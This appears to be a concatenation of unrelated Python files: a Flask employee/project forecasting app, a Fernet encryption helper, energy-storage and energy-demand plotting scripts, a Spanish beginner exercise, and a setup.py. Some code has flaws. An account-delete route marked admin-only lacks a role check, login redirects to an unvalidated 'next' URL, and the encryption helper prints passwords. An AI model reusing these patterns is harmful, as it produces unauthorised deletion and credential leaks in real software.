@app.route("/assignments_report_csv", methods=['GET'])
@login_required
def assignments_report_csv():
if request.method == 'GET':
if current_user.role == 'Admin':
data = ForecastItem.query.join(Employee).all()
serialized = ForecastItemSchema(many=True)
result = serialized.dump(data)
return jsonify({'data': result})
elif current_user.role == 'Editor':
data = ForecastItem.query \
.join(Employee) \
.filter(ForecastItem.user_id == current_user.id)
serialized = ForecastItemSchema(many=True)
result = serialized.dump(data)
return jsonify({'data': result})
else:
data = ForecastItem.query \
.join(Employee) \
.filter(ForecastItem.employee_id == current_user.employee_id)
serialized = ForecastItemSchema(many=True)
result = serialized.dump(data)
return jsonify({'data': result})
else:
return redirect(url_for(assignments_report))
@app.route("/employees", methods=['GET', 'POST'])
@login_required
def employees():
if current_user.role == 'Admin' or current_user.role == 'Editor':
form = EmployeeForm()
search_form = SearchEmployeeForm()
res = search_form.searchField.data
choice = search_form.searchBy.data
data = Employee.query.join(Department) \
.filter(Employee.department_id == Department.id) \
.order_by(Employee.first_name.asc())
if res and search_form.validate_on_submit():
if choice == 'First Name':
data = Employee.query.join(Department) \
.filter(Employee.first_name.like(f'%{res.capitalize()}%'))
elif choice == 'Last Name':
data = Employee.query.join(Department) \
.filter(Employee.last_name.like(f'%{res.capitalize()}%'))
elif choice == 'Department':
data = Employee.query.join(Department) \
.filter(Department.name.like(f'%{res.capitalize()}%'))
else:
data = Employee.query.join(Department) \
.filter(Employee.department_id == Department.id) \
.order_by(Employee.first_name.asc())
return render_template('employees.html',
title='Employees',
form=form,
search_form=search_form,
data=data)
if form.validate_on_submit():
new_employee = Employee(first_name=form.first_name.data,
last_name=form.last_name.data,
department_id=form.department.data
)
db.session.add(new_employee)
db.session.commit()
flash(f'{form.first_name.data} {form.first_name.data} has been added.', 'success')
return redirect(url_for('home'))
return render_template('employees.html',
title='Employees',
form=form,
search_form=search_form,
data=data)
else:
return redirect(url_for('home'))
@app.route("/employees/<int:employee_id>", methods=['GET', 'POST'])
@login_required
def employee(employee_id):
data = Employee.query.get_or_404(employee_id)
form = EmployeeForm()
related = ForecastItem.query.join(Employee).filter(
and_(Employee.id == employee_id, ForecastItem.employee_id == employee_id))
if form.validate_on_submit():
data.first_name = form.first_name.data
data.last_name = form.last_name.data
data.department_id = form.department.data
db.session.commit()
flash(f'{data.first_name} {data.last_name}\'s information has been updated.', 'success')
return redirect(url_for('employees',
employee_id=employee_id))
elif request.method == 'GET':
form.first_name.data = data.first_name
form.last_name.data = data.last_name
form.department.data = data.department_id
return render_template('employee.html',
title='Employee Information',
data=data,
form=form,
related=related)
@app.route("/employees/<int:employee_id>/delete", methods=['POST'])
@login_required
def delete_employee(employee_id):
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = Employee.query.get_or_404(employee_id)
db.session.delete(data)
db.session.commit()
flash('Employee has been deleted.', 'success')
return redirect(url_for('employees'))
else:
return redirect(url_for('home'))
@app.route("/employees_report", methods=['GET', 'POST'])
@login_required
def employees_report():
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = Employee.query.join(Department) \
.filter(Employee.department_id == Department.id) \
.order_by(Employee.first_name.asc())
form = FilterForm()
return render_template('employees_report.html',
title='Projects Report',
data=data,
form=form)
else:
return redirect(url_for('home'))
@app.route("/employees_report_csv", methods=['GET'])
@login_required
def employees_report_csv():
if current_user.role == 'Admin' or current_user.role == 'Editor':
if request.method == 'GET':
data = Employee.query.join(Department) \
.filter(Employee.department_id == Department.id) \
.order_by(Employee.first_name.asc())
serialized = EmployeesSchema(many=True)
result = serialized.dump(data)
return jsonify({'data': result})
else:
return redirect(url_for('home'))
@app.route("/departments", methods=['GET', 'POST'])
@login_required
def departments():
if current_user.role == 'Admin':
data = Department.query.order_by(Department.name.asc()).all()
form = DepartmentForm()
if form.validate_on_submit():
new_department = Department(name=form.name.data)
db.session.add(new_department)
db.session.commit()
flash(f'{form.name.data} department has been added.', 'success')
return redirect(url_for('home'))
return render_template('departments.html',
title='Departments',
form=form,
data=data)
else:
return redirect(url_for('home'))
@app.route("/departments/<int:department_id>", methods=['GET', 'POST'])
@login_required
def department(department_id):
if current_user.role == 'Admin':
data = Department.query.get_or_404(department_id)
assigned_employees = Employee.query.filter_by(department_id=department_id).order_by(
Employee.first_name.asc()).all()
form = DepartmentForm()
if form.validate_on_submit():
data.name = form.name.data
db.session.commit()
flash('Department name has been updated.', 'success')
return redirect(url_for('departments',
department_id=department_id))
elif request.method == 'GET':
form.name.data = data.name
return render_template('department.html',
title='Edit Department',
data=data,
form=form,
assigned_employees=assigned_employees)
else:
return redirect(url_for('home'))
@app.route("/departments/<int:department_id>/delete", methods=['POST'])
@login_required
def delete_department(department_id):
if current_user.role == 'Admin':
data = Department.query.get_or_404(department_id)
db.session.delete(data)
db.session.commit()
flash('Department has been deleted.', 'success')
return redirect(url_for('departments'))
else:
return redirect(url_for('home'))
@app.route("/projects", methods=['GET', 'POST'])
@login_required
def projects():
if current_user.role == 'Admin' or current_user.role == 'Editor':
form = ProjectForm()
search_form = SearchProjectsForm()
res = search_form.searchField.data
choice = search_form.searchBy.data
data = Project.query.join(Employee).order_by(Project.project_number.asc()).all()
if res and search_form.validate_on_submit():
if choice == 'Project Number':
data = Project.query.join(Employee) \
.filter(Project.project_number == res) \
.order_by(Project.project_number.asc()).all()
elif choice == 'Project Name':
data = Project.query.join(Employee).filter(Project.project_name.like(f'%{res.capitalize()}%')).all()
elif choice == 'Manager\'s First Name':
data = Project.query.join(Employee).filter(Employee.first_name.like(f'%{res.capitalize()}%')).all()
elif choice == 'Manager\'s Last Name':
data = Project.query.join(Employee).filter(Employee.last_name.like(f'%{res.capitalize()}%')).all()
else:
data = Project.query.join(Employee).order_by(Project.project_number.asc()).all()
return render_template('projects.html',
title='Projects',
form=form,
search_form=search_form,
data=data)
if form.validate_on_submit():
new_project = Project(
user_id=current_user.id,
project_number=form.project_number.data,
project_name=form.project_name.data,
manager_id=form.project_manager.data,
project_status=form.project_status.data,
project_description=form.project_description.data
)
db.session.add(new_project)
db.session.commit()
flash(f'{form.project_number.data} has been added.', 'success')
return redirect(url_for('home'))
else:
return redirect(url_for('home'))
return render_template('projects.html',
title='Projects',
form=form,
search_form=search_form,
data=data)
@app.route("/projects/<int:project_id>", methods=['GET', 'POST'])
@login_required
def project(project_id):
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = Project.query.get_or_404(project_id)
form = ProjectForm()
related = ForecastItem.query.join(Employee).filter(
and_(Project.id == project_id, ForecastItem.project_id == project_id))
if form.validate_on_submit():
data.user_id = current_user.id
data.project_number = form.project_number.data
data.project_name = form.project_name.data
data.manager_id = form.project_manager.data
data.project_status = form.project_status.data
data.project_description = form.project_description.data
db.session.commit()
flash('Project information has been updated.', 'success')
return redirect(url_for('projects',
project_id=project_id))
elif request.method == 'GET':
form.project_number.data = data.project_number
form.project_name.data = data.project_name
form.project_manager.data = data.manager_id
form.project_status.data = data.project_status
form.project_description.data = data.project_description
return render_template('project.html',
title='Edit Project Information',
data=data,
form=form,
related=related)
else:
return redirect(url_for('home'))
@app.route("/projects/<int:project_id>/delete", methods=['POST'])
@login_required
def delete_project(project_id):
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = Project.query.get_or_404(project_id)
db.session.delete(data)
db.session.commit()
flash('Project has been deleted.', 'success')
return redirect(url_for('projects'))
else:
return redirect(url_for('home'))
@app.route("/projects_report", methods=['GET', 'POST'])
@login_required
def projects_report():
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = Project.query.join(Employee)
form = FilterForm()
return render_template('project_reports.html',
title='Projects Report',
data=data,
form=form)
else:
return redirect(url_for('home'))
@app.route("/projects_report_csv", methods=['GET'])
@login_required
def projects_report_csv():
if current_user.role == 'Admin' or current_user.role == 'Editor':
if request.method == 'GET':
data = Project.query.join(Employee)
serialized = ProjectSchema(many=True)
result = serialized.dump(data)
return jsonify({'data': result})
else:
return redirect(url_for('home'))
@app.route("/assignment_types", methods=['GET', 'POST'])
@login_required
def assignment_types():
if current_user.role == 'Admin':
data = AssignmentTypes.query.order_by(AssignmentTypes.assignment_type.asc()).all()
form = AssignmentForm()
if form.validate_on_submit():
assignment = AssignmentTypes(assignment_type=form.assignment_name.data)
db.session.add(assignment)
db.session.commit()
flash('New assignment type has been added.', 'success')
return redirect(url_for('home'))
return render_template('assignment_types.html',
title='Assignment Types',
form=form,
data=data)
else:
return redirect(url_for('home'))
@app.route("/assignment_types/<int:assignment_type_id>", methods=['GET', 'POST'])
@login_required
def assignment_type(assignment_type_id):
if current_user.role == 'Admin':
data = AssignmentTypes.query.get_or_404(assignment_type_id)
form = AssignmentForm()
if form.validate_on_submit():
data.assignment_type = form.assignment_name.data
db.session.commit()
flash('Assignment type has been updated.', 'success')
return redirect(url_for('assignment_types',
assignment_type_id=assignment_type_id))
elif request.method == 'GET':
form.assignment_name.data = data.assignment_type
return render_template('assignment_type.html',
title='Assignment Type Information',
data=data,
form=form)
else:
return redirect(url_for('home'))
@app.route("/assignment_types/<int:assignment_type_id>/delete", methods=['POST'])
@login_required
def delete_assignment_type(assignment_type_id):
if current_user.role == 'Admin':
data = AssignmentTypes.query.get_or_404(assignment_type_id)
db.session.delete(data)
db.session.commit()
flash('assignment type has been deleted.', 'success')
return redirect(url_for('assignment_types'))
else:
return redirect(url_for('home'))
# enable this route for manual registration when needed. remember to enable the appropriate links and templates
# @app.route("/register", methods=['GET', 'POST'])
# def register():
# if current_user.is_authenticated:
# return redirect(url_for('home'))
#
# form = RegistrationForm()
# if form.validate_on_submit():
# hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
# user = User(
# username=form.username.data,
# email=form.email.data,
# password=hashed_password
# )
# db.session.add(user)
# db.session.commit()
# flash(f'Account created for {form.email.data}.', 'success')
# return redirect(url_for('login'))
# return render_template('register.html',
# title='Register',
# form=form)
@app.route("/login", methods=['GET', 'POST'])
def login():
if current_user.is_authenticated and current_user.is_active:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user_name = User.query.filter_by(username=form.username.data).first()
if user_name and bcrypt.check_password_hash(user_name.password, form.password.data):
login_user(user_name, remember=form.remember.data)
next_page = request.args.get('next')
return redirect(next_page) if next_page else redirect(url_for('home'))
else:
flash('Login Unsuccessful. Please contact your IT Administrator.', 'danger')
return render_template('login.html',
title='Login',
form=form)
@app.route("/logout")
def logout():
logout_user()
return redirect(url_for('home'))
@app.route("/account", methods=['GET', 'POST'])
@login_required
def account():
users_data = User.query.all()
projects_data = Project.query \
.join(Employee) \
.order_by(Project.project_number.asc()) \
.all()
if current_user.role == 'Admin':
assignments_data = ForecastItem.query \
.join(Project) \
.join(Employee) \
.join(AssignmentTypes) \
.all()
elif current_user.role == 'Editor':
projects_data = Project.query \
.join(Employee) \
.join(User) \
.filter(Project.user_id == current_user.id) \
.order_by(Project.project_number.asc())
assignments_data = ForecastItem.query \
.join(Project, ForecastItem.project_id == Project.id) \
.join(Employee, Employee.id == ForecastItem.employee_id) \
.join(User, ForecastItem.user_id == User.id) \
.join(AssignmentTypes) \
.filter(ForecastItem.user_id == current_user.id) \
.limit(10)
else:
assignments_data = ForecastItem.query \
.filter(ForecastItem.employee_id == current_user.employee_id)
return render_template('account.html',
title='Account',
users_data=users_data,
current_user=current_user,
projects_data=projects_data,
assignments_data=assignments_data
)
# connects to fetch_months.js script to get the distinct dates from the database without refresh the form
@app.route("/fetch_months", methods=['POST'])
@login_required
def fetch_months():
req = request.json['year_num']
def isDate(string, fuzzy=False):
try:
parse(string, fuzzy=fuzzy)
choices = [
item.start_date.strftime('%B') for item in
db.session.query(ForecastItem)
.distinct(func.to_char(ForecastItem.start_date, "FMMonth"))
.filter(extract('year', ForecastItem.start_date) == string)
]
return choices
except Exception as err:
print(err)
return False
return jsonify({'month_choices': isDate(req)})
# For admin use only
@app.route("/account/<int:user_id>", methods=['GET', 'POST'])
@login_required
def edit_account(user_id):
curr_user = current_user
if curr_user.role == 'Admin':
data = User.query.get_or_404(user_id)
form = AccountForm()
if form.validate_on_submit():
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
data.username = form.username.data
data.email = form.email.data
data.password = hashed_password
data.role = form.role.data
data.is_active = form.is_active.data
data.employee_id = form.employee.data
db.session.commit()
flash('User information has been updated.', 'success')
return redirect(url_for('account', id=user_id))
elif request.method == 'GET':
form.username.data = data.username
form.email.data = data.email
form.role.data = data.role
form.is_active.data = data.is_active
form.employee.data = data.employee_id
return render_template('edit_account.html',
title='Edit Account',
form=form,
data=data)
else:
return redirect(url_for('home'))
# For admin use only
@app.route("/account/<int:user_id>/delete", methods=['POST'])
@login_required
def delete_account(user_id):
data = User.query.get_or_404(user_id)
db.session.delete(data)
db.session.commit()
flash(f'{data.username} has been deleted.', 'success')
return redirect(url_for('account'))
# For admin use only
@app.route("/register_as_admin", methods=['GET', 'POST'])
@login_required
def register_as_admin():
curr_user = current_user
if curr_user.role == 'Admin':
form = RegistrationForm()
if form.validate_on_submit():
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
user = User(
username=form.username.data,
email=form.email.data,
role=form.role.data,
employee_id=form.employee.data,
password=hashed_password
)
db.session.add(user)
db.session.commit()
flash(f'Account created for {form.email.data}.', 'success')
return redirect(url_for('account'))
return render_template('register_as_admin.html',
title='Register New',
form=form)
else:
return redirect(url_for('home'))
# error pages
@app.errorhandler(403)
def page_not_found(e):
return render_template('errors/403.html')
# error pages
@app.errorhandler(404)
def page_not_found(e):
return render_template('errors/404.html')
# error pages
@app.errorhandler(500)
def page_not_found(e):
return render_template('errors/500.html')
| 32,094 | 8,901 |
import base64
import os
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
def getKey (salt, password):
print(password)
print(salt)
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=bytes(salt.encode()),
iterations=100000
)
key = base64.urlsafe_b64encode(kdf.derive(bytes(password.encode())))
f = Fernet(key)
return f
def encryptMessage(key, message):
token = key.encrypt(bytes(message.encode()))
return(token)
def decrypt(key, token):
try:
str = key.decrypt(token)
except:
print("Invalid Token")
str = ""
return(str)
#message = b"hello world"
#message = "hello world"
#password = b"password"
#salt = os.urandom(16)
#salt = b"hello"
#kdf = PBKDF2HMAC(
# algorithm=hashes.SHA256(),
# length=32,
# salt=salt,
# iterations=100000
# )
#key = base64.urlsafe_b64encode(kdf.derive(password))
#f = Fernet(key)
#token = f.encrypt(bytes(message.encode()))
#token = f.encrypt(message)
#print(token)
#b'...'
#print(f.decrypt(token))
#b'Secret Message!'
| 1,248 | 502 |
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes, mark_inset
from math import pi
import numpy as np
import matplotlib.colors as colors
import matplotlib.patches as mpatches
df = pd.read_csv('all_analysis.csv')
# f, a = plt.subplots(2,1)
# a = a.ravel()
#
# sns.scatterplot(data=df, x='NEAR_DIST',y='feasible_fr', hue='NEAR_FC', ax=a[0])
#
# sns.scatterplot(data=df, x='NEAR_DIST',y='RASTERVALU', hue='NEAR_FC', ax=a[1])
# conversions and column renaming
df.loc[:, 'Distance to shore (km)'] = df.loc[:, 'NEAR_DIST'] / 1000.0
df.loc[:, 'Water depth (m)'] = df.loc[:, 'RASTERVALU']
df.loc[:, 'Feasibility (%)'] = df.loc[:, 'feasible_fr'] * 100.0
df.loc[:, 'Formation (-)'] = df.loc[:, 'formation']
df.loc[:, 'Nearest State (-)'] = df.loc[:, 'NEAR_FC']
loc_dict = {'VA_shore': 'Virginia', 'MD_shore': 'Maryland', 'NJ_shore': 'New Jersey', 'DE_shore': 'Delaware',
'NY_shore': 'New York', 'MA_shore': 'Massachusetts', 'RI_shore': 'Rhode Island'}
formation_dict = {'LK1': 'Lower Cretaceous', 'MK1-3': 'Middle Cretaceous', 'UJ1': 'Upper Jurassic'}
# rename
for loc in df.loc[:, 'Nearest State (-)'].unique():
ind = df.loc[:, 'Nearest State (-)'] == loc
df.loc[ind, 'Nearest State (-)'] = loc_dict[loc]
# rename
for formation in df.loc[:, 'Formation (-)'].unique():
ind = df.loc[:, 'Formation (-)'] == formation
df.loc[ind, 'Formation (-)'] = formation_dict[formation]
# Filter data with feasibility greater than 0.8
# df = df[df.loc[:,'Feasibility (%)']>=0.8]
# Filter data with mean RTE greater than 0.5
# df = df[df.loc[:, 'RTE_mean'] >= 0.5]
sns.histplot(df, x='Water depth (m)')
df.loc[:, 'RTE [%]'] = df.loc[:, 'RTE_mean']
df.loc[:, 'Water depth'] = '> 60m'
df.loc[df.loc[:, 'Water depth (m)'] > -60.0, 'Water depth'] = '30m - 60m'
df.loc[df.loc[:, 'Water depth (m)'] > -30.0, 'Water depth'] = '<30 m'
# sns.histplot(df, x='RTE [%]', hue='Water depth', hue_order=['<30 m', '30m - 60m', '> 60m'])
palette_rgb = np.array([[69, 117, 180],
[145, 191, 219],
[224, 243, 248]])
palette_hex = []
for rgb in palette_rgb:
palette_hex.append(colors.rgb2hex(rgb / 255))
# cmap = colors.ListedColormap(palette_hex)
# Calculate storage potential
frac = 0.1 # fraction of grid available for storage
A_grid = 19790 * 19790 # each square is 20 km by 20 km
well_MWh = 200 * 24 # 200 MW at 24 hour duration
df.loc[:, 'A_well'] = pi * df.loc[:, 'r_f'] ** 2
df.loc[:, 'n_wells'] = frac * A_grid / df.loc[:, 'A_well']
df.loc[:, 'MWh'] = df.loc[:, 'n_wells'] * well_MWh
# bin results
entries = ['RTE', 'MWh', 'Depth']
RTE_bins = [0.40, 0.50, 0.60, 0.65]
RTE_labels = ['40 - 50', '50 - 60', '> 60']
Depth_bins = np.arange(0.0, -200.1, -10.0)
df_smry = pd.DataFrame(index=RTE_labels, columns=Depth_bins[:-1])
df_highEff = pd.DataFrame()
for i in range(len(RTE_bins) - 1):
for j in range(len(Depth_bins) - 1):
# Select relevant indices
ind = (RTE_bins[i] <= df.loc[:, 'RTE_mean']) & (df.loc[:, 'RTE_mean'] < RTE_bins[i + 1]) \
& (Depth_bins[j + 1] < df.loc[:, 'Water depth (m)']) & (df.loc[:, 'Water depth (m)'] <= Depth_bins[j])
# store result
df_smry.loc[RTE_labels[i], Depth_bins[j]] = df.loc[ind, 'MWh'].sum()
if RTE_bins[i] >= 0.60:
df_highEff = df_highEff.append(df.loc[ind, :], ignore_index=True)
# plot
widths = []
for j in range(len(Depth_bins) - 1):
widths.append(Depth_bins[j] - Depth_bins[j + 1])
for i, index in enumerate(reversed(df_smry.index)):
# ind = df_smry.loc[:, 'RTE'] == RTE_label
x = df_smry.columns * -1.0
height = df_smry.loc[index, :] / 1e6 # TWh
if i == 0:
plt.bar(x, height, width=widths, label=index, align='edge', color=palette_hex[i])
bottom = height
else:
plt.bar(x, height, bottom=bottom, width=widths, label=index, align='edge', color=palette_hex[i])
bottom = bottom + height
# Add outline
plt.step(x, bottom, 'k', where='post')
# labels
plt.xlabel('Water depth (m)')
plt.ylabel('Storage capacity (TWh)')
# limits
xlims = [0.0, Depth_bins[-1] * -1.0]
ylims = [0.0, 400]
plt.xlim(left=xlims[0], right=xlims[1])
plt.ylim(bottom=ylims[0], top=ylims[1])
# Additional line - Wind turbines
plt.plot([60.0, 60.0], ylims, 'k--')
# set background color
# ax = plt.gca()
# ax.set_facecolor((0.95, 0.95, 0.95))
# create legend
ax = plt.gca()
patches = [mpatches.Patch(edgecolor='black', facecolor=palette_hex[2], label=RTE_labels[0]),
mpatches.Patch(edgecolor='black', facecolor=palette_hex[1], label=RTE_labels[1]),
mpatches.Patch(edgecolor='black', facecolor=palette_hex[0], label=RTE_labels[2])]
leg1 = ax.legend(handles=patches, bbox_to_anchor=(1.0, 1.0), loc="upper right", title='Round-trip Efficiency (%)')
# Add text
plt.text(35, 375, 'Fixed bottom\nwind turbines', horizontalalignment='center', verticalalignment='center',
fontsize='medium')
plt.text(85, 375, 'Floating\nwind turbines', horizontalalignment='center', verticalalignment='center',
fontsize='medium')
# Add arrows
ax.arrow(x=60 - 5, y=350, dx=-25, dy=0.0, width=2.0, color='black')
ax.arrow(x=60 + 5, y=350, dx=25, dy=0.0, width=2.0, color='black')
# Set size
# Column width guidelines https://www.elsevier.com/authors/author-schemas/artwork-and-media-instructions/artwork-sizing
# Single column: 90mm = 3.54 in
# 1.5 column: 140 mm = 5.51 in
# 2 column: 190 mm = 7.48 i
width = 8.0 # inches
height = 6.5 # inches
f = plt.gcf()
f.set_size_inches(width, height)
#
savename = "Fig3_storage_potential.png"
plt.savefig(savename, dpi=400)
# Sum total TWh in less than 60m for greater than 50% efficiency
rows = ['50 - 60', '> 60']
cols = [0, -10, -20, -30, -40, -50]
total_MWh = df_smry.loc[rows, cols].sum().sum()
total_GWh = total_MWh / 1000
print('GWh RTE >50% and water depth <60m: ' + str(total_GWh))
# Sum total TWh in less than 60m for greater than 60% efficiency
rows = ['> 60']
cols = [0, -10, -20, -30, -40, -50]
total_MWh = df_smry.loc[rows, cols].sum().sum()
total_GWh = total_MWh / 1000
print('GWh RTE >60% and water depth <60m: ' + str(total_GWh))
# save high efficiency and shallow water sites to csv
df_highEff.to_csv('high_efficiency_and_shallow_sites.csv') | 6,320 | 2,815 |
############Con una función##########################
print('Valor de M:')
M = int(input())
print('Valor de N:')
N = int(input())
def potencia(M, N):
resultado=1
for i in range(N):
resultado *= M
return resultado
print(M**N)
print(pow(M, N))
print(potencia(M,N))
#########################Con un listas comprimidas########################
print('Valor de M:')
M = int(input())
print('Valor de N:')
N = int(input())
list = [i**N for i in range(0, N)]
print('Potencias, ' + str)
| 508 | 183 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Python packaging."""
import os
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
class Tox(TestCommand):
"""Test command that runs tox."""
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import tox # import here, cause outside the eggs aren't loaded.
errno = tox.cmdline(self.test_args)
sys.exit(errno)
#: Absolute path to directory containing setup.py file.
here = os.path.abspath(os.path.dirname(__file__))
#: Boolean, ``True`` if environment is running Python version 2.
IS_PYTHON2 = sys.version_info[0] == 2
# Data for use in setup.
NAME = 'piecutter'
DESCRIPTION = 'Templating framework.'
README = open(os.path.join(here, 'README.rst')).read()
VERSION = open(os.path.join(here, 'VERSION')).read().strip()
AUTHOR = u'Rémy HUBSCHER'
EMAIL = 'hubscher.remy@gmail.com'
LICENSE = 'BSD'
URL = 'https://{name}.readthedocs.io/'.format(name=NAME)
CLASSIFIERS = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
]
KEYWORDS = [
'template',
'templates',
'template engine',
'jinja2',
'django',
'generator',
'file generation',
'scaffold',
]
PACKAGES = [NAME.replace('-', '_')]
REQUIREMENTS = [
'Django',
'jinja2',
'requests',
'setuptools',
'six',
]
if IS_PYTHON2:
REQUIREMENTS.extend(['mock'])
ENTRY_POINTS = {}
TEST_REQUIREMENTS = ['tox']
CMDCLASS = {'test': Tox}
if __name__ == '__main__': # Do not run setup() when we import this module.
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=README,
classifiers=CLASSIFIERS,
keywords=' '.join(KEYWORDS),
author=AUTHOR,
author_email=EMAIL,
url=URL,
license=LICENSE,
packages=PACKAGES,
include_package_data=True,
zip_safe=False,
install_requires=REQUIREMENTS,
entry_points=ENTRY_POINTS,
tests_require=TEST_REQUIREMENTS,
cmdclass=CMDCLASS,
)
| 2,353 | 838 |
"""Plotting model results and storing as PDF to result folder
"""
import os
import logging
from energy_demand.technologies import tech_related
from energy_demand.plotting import plotting_styles
from energy_demand.plotting import fig_lad_related
from energy_demand.plotting import fig_one_fueltype_multiple_regions_peak_h
from energy_demand.plotting import fig_fuels_enduses_y
from energy_demand.plotting import fig_stacked_enduse
from energy_demand.plotting import fig_cross_graphs
from energy_demand.plotting import fig_stacked_enduse_sectors
from energy_demand.plotting import fig_lf
from energy_demand.plotting import fig_fuels_enduses_week
from energy_demand.plotting import fig_load_profile_dh_multiple
from energy_demand.plotting import fig_fuels_peak_h
from energy_demand.plotting import fig_weather_variability_priod
#matplotlib.use('Agg') # Used to make it work in linux179
def run_all_plot_functions(
results_container,
reg_nrs,
regions,
lookups,
result_paths,
assumptions,
enduses,
plot_crit,
base_yr,
comparison_year
):
"""Summary function to plot all results
comparison_year : int
Year to generate comparison plots
"""
if plot_crit['plot_lad_cross_graphs']:
try:
# Plot cross graph where very region is a dot
fig_cross_graphs.plot_cross_graphs(
base_yr=base_yr,
comparison_year=comparison_year,
regions=regions,
ed_year_fueltype_regs_yh=results_container['ed_fueltype_regs_yh'],
reg_load_factor_y=results_container['reg_load_factor_y'],
fueltype_int=lookups['fueltypes']['electricity'],
fueltype_str='electricity',
fig_name=os.path.join(
result_paths['data_results_PDF'], "comparions_LAD_cross_graph_electricity_by_cy.pdf"),
label_points=False,
plotshow=False)
fig_cross_graphs.plot_cross_graphs(
base_yr=base_yr,
comparison_year=comparison_year,
regions=regions,
ed_year_fueltype_regs_yh=results_container['ed_fueltype_regs_yh'],
reg_load_factor_y=results_container['reg_load_factor_y'],
fueltype_int=lookups['fueltypes']['gas'],
fueltype_str='gas',
fig_name=os.path.join(
result_paths['data_results_PDF'], "comparions_LAD_cross_graph_gas_by_cy.pdf"),
label_points=False,
plotshow=False)
except KeyError:
logging.info("Check if correct comparison year is provided, i.e. really data exists for this year")
# ----------
# Plot LAD differences for first and last year
# ----------
try:
fig_lad_related.plot_lad_comparison(
base_yr=2015,
comparison_year=2050,
regions=regions,
ed_year_fueltype_regs_yh=results_container['ed_fueltype_regs_yh'],
fueltype_int=lookups['fueltypes']['electricity'],
fueltype_str='electricity',
fig_name=os.path.join(
result_paths['data_results_PDF'], "comparions_LAD_modelled_electricity_by_cy.pdf"),
label_points=False,
plotshow=False)
print("... plotted by-cy LAD energy demand compariosn")
# Plot peak h for every hour
fig_lad_related.lad_comparison_peak(
base_yr=2015,
comparison_year=2050,
regions=regions,
ed_year_fueltype_regs_yh=results_container['ed_fueltype_regs_yh'],
fueltype_int=lookups['fueltypes']['electricity'],
fueltype_str='electricity',
fig_name=os.path.join(
result_paths['data_results_PDF'], "comparions_LAD_modelled_electricity_peakh_by_cy.pdf"),
label_points=False,
plotshow=False)
print("... plotted by-cy LAD energy demand compariosn")
except:
pass
# ----------------
# Plot demand for every region over time
# -------------------
if plot_crit['plot_line_for_every_region_of_peak_demand']:
logging.info("... plot fuel per fueltype for every region over annual teimsteps")
fig_one_fueltype_multiple_regions_peak_h.plt_regions_peak_h(
results_container['ed_fueltype_regs_yh'],
lookups,
regions,
os.path.join(
result_paths['data_results_PDF'],
'peak_h_total_electricity.pdf'),
fueltype_str_to_plot="electricity")
if plot_crit['plot_fuels_enduses_y']:
#... Plot total fuel (y) per fueltype as line chart"
fig_fuels_enduses_y.run(
results_container['ed_fueltype_regs_yh'],
lookups,
os.path.join(
result_paths['data_results_PDF'],
'y_fueltypes_all_enduses.pdf'))
# ------------
# Plot stacked annual enduses
# ------------
if plot_crit['plot_stacked_enduses']:
rs_enduses_sorted = [
'rs_space_heating',
'rs_water_heating',
'rs_lighting',
'rs_cold',
'rs_wet',
'rs_consumer_electronics',
'rs_home_computing',
'rs_cooking']
ss_enduses_sorted = [
'ss_space_heating',
'ss_water_heating',
'ss_lighting',
'ss_catering',
'ss_small_power',
'ss_fans',
'ss_cooling_humidification',
'ss_ICT_equipment',
'ss_other_gas',
'ss_other_electricity',
'ss_cooled_storage']
is_enduses_sorted = [
'is_space_heating',
'is_lighting',
'is_refrigeration',
'is_motors',
'is_compressed_air',
'is_high_temp_process',
'is_low_temp_process',
'is_other',
'is_drying_separation']
rs_color_list = plotting_styles.rs_color_list_selection()
ss_color_list = plotting_styles.ss_color_list_selection()
is_color_list = plotting_styles.is_color_list_selection()
# Residential
fig_stacked_enduse.run(
assumptions['sim_yrs'],
results_container['results_enduse_every_year'],
rs_enduses_sorted,
rs_color_list,
os.path.join(
result_paths['data_results_PDF'], "stacked_rs_country.pdf"),
plot_legend=True)
# Service
fig_stacked_enduse.run(
assumptions['sim_yrs'],
results_container['results_enduse_every_year'],
ss_enduses_sorted,
ss_color_list,
os.path.join(
result_paths['data_results_PDF'], "stacked_ss_country.pdf"),
plot_legend=True)
# Industry
fig_stacked_enduse.run(
assumptions['sim_yrs'],
results_container['results_enduse_every_year'],
is_enduses_sorted,
is_color_list,
os.path.join(
result_paths['data_results_PDF'], "stacked_is_country_.pdf"),
plot_legend=True)
# ------------------------------
# Plot annual demand for enduses for all submodels
# ------------------------------
if plot_crit['plot_y_all_enduses']:
fig_stacked_enduse_sectors.run(
lookups,
assumptions['sim_yrs'],
results_container['results_enduse_every_year'],
enduses['residential'],
enduses['service'],
enduses['industry'],
os.path.join(result_paths['data_results_PDF'],
"stacked_all_enduses_country.pdf"))
# --------------
# Fuel per fueltype for whole country over annual timesteps
# ----------------
if plot_crit['plot_fuels_enduses_y']:
logging.info("... plot fuel per fueltype for whole country over annual timesteps")
#... Plot total fuel (y) per fueltype as line chart"
fig_fuels_enduses_y.run(
results_container['ed_fueltype_regs_yh'],
lookups,
os.path.join(
result_paths['data_results_PDF'],
'y_fueltypes_all_enduses.pdf'))
# ----------
# Plot seasonal typical load profiles
# Averaged load profile per daytpe for a region
# ----------
# ------------------------------------
# Load factors per fueltype and region
# ------------------------------------
if plot_crit['plot_lf'] :
for fueltype_str, fueltype_int in lookups['fueltypes'].items():
'''fig_lf.plot_seasonal_lf(
fueltype_int,
fueltype_str,
